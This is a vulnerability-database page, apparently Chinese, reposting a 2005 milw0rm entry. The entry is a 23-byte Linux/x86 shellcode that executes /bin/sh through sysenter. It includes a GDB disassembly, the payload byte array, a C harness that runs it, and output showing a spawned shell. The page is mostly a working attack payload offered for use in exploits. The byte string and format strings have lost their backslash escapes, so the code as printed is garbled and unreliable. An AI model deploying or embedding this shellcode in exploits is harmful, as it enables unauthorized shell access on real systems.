Linux/x86 – execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (23 bytes)
漏洞ID | 1055365 | 漏洞类型 | |
发布时间 | 2005-09-04 | 更新时间 | 2005-09-04 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux_x86 | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
lnx_binsh4.c - v1 - 23 Byte /bin/sh sysenter Opcode Array Payload
Copyright(c) 2005 c0ntex <[email protected]>
Copyright(c) 2005 BaCkSpAcE <[email protected]>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston,
MA 02111-1307 USA
*/
/*
Tested: fedora core 3 - c0ntex
fedora core 4 - BaCkSpAcE
debian SID - amnesia
execve("/bin/sh") using sysenter from __kernel_vsyscall appose to int $0x80
(gdb) disas __kernel_vsyscall
Dump of assembler code for function __kernel_vsyscall:
0xffffe400 <__kernel_vsyscall+0>: push %ecx
0xffffe401 <__kernel_vsyscall+1>: push %edx
0xffffe402 <__kernel_vsyscall+2>: push %ebp
0xffffe403 <__kernel_vsyscall+3>: mov %esp,%ebp
0xffffe405 <__kernel_vsyscall+5>: sysenter
0xffffe407 <__kernel_vsyscall+7>: nop
0xffffe408 <__kernel_vsyscall+8>: nop
0xffffe409 <__kernel_vsyscall+9>: nop
0xffffe40a <__kernel_vsyscall+10>: nop
0xffffe40b <__kernel_vsyscall+11>: nop
0xffffe40c <__kernel_vsyscall+12>: nop
0xffffe40d <__kernel_vsyscall+13>: nop
0xffffe40e <__kernel_vsyscall+14>: jmp 0xffffe403 <__kernel_vsyscall+3>
0xffffe410 <__kernel_vsyscall+16>: pop %ebp
0xffffe411 <__kernel_vsyscall+17>: pop %edx
0xffffe412 <__kernel_vsyscall+18>: pop %ecx
0xffffe413 <__kernel_vsyscall+19>: ret
0xffffe414 <__kernel_vsyscall+20>: add %al,(%eax)
0xffffe416 <__kernel_vsyscall+22>: add %al,(%eax)
0xffffe418 <__kernel_vsyscall+24>: add %al,(%eax)
0xffffe41a <__kernel_vsyscall+26>: add %al,(%eax)
0xffffe41c <__kernel_vsyscall+28>: add %al,(%eax)
0xffffe41e <__kernel_vsyscall+30>: add %al,(%eax)
End of assembler dump.
(gdb) q
so we replace
int $0x80
instruction with
push %ecx
push %edx
push %ebp
mov %esp,%ebp
sysenter
which does make the shellcode slightly larger :/
804807a: 51 push %ecx
804807b: 52 push %edx
804807c: 55 push %ebp
804807d: 89 e5 mov %esp,%ebp
804807f: 0f 34 sysenter
$ ./lnx_binsh4
[-] Stack Pointer found -> [0xbfe0f0d8]
[-] Size of payload egg -> [23]
[-] Payload Begin -> [0x80496c0]
[-] Payload End -> [0x80496d7]
sh-3.00b$
*/
/*
Calling: execve(/bin/sh), exit(0)
*/
#include <stdio.h>
typedef char wikkid;
/* reduced shellcode size from 45 to 23 - BaCkSpAcE */
wikkid oPc0d3z[] = "x6ax0bx58x99x52x68x2fx2f"
"x73x68x68x2fx62x69x6ex54"
"x5bx52x53x54x59x0fx34";
unsigned long grab_esp()
{
__asm__("movl %esp,%eax");
}
int main(void)
{
unsigned long delta;
void (*pointer)();
delta = grab_esp();
fprintf(stderr, "n[-] Stack Pointer found -> [0x%x]n", delta);
fprintf(stderr, "t[-] Size of payload egg -> [%d]n", sizeof(oPc0d3z)-1);
pointer=(void*)&oPc0d3z;
while(pointer) {
fprintf(stderr, "t[-] Payload Begin -> [0x%x]n", pointer);
fprintf(stderr, "t[-] Payload End -> [0x%x]nn", pointer+23);
pointer();
}
_exit(0);
}
// milw0rm.com [2005-09-04]
相关推荐: Atomic Photo Album Apa_PHPInclude.INC.PHP Remote File Include Vulnerability
Atomic Photo Album Apa_PHPInclude.INC.PHP Remote File Include Vulnerability 漏洞ID 1096281 漏洞类型 Input Validation Error 发布时间 2005-07-…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666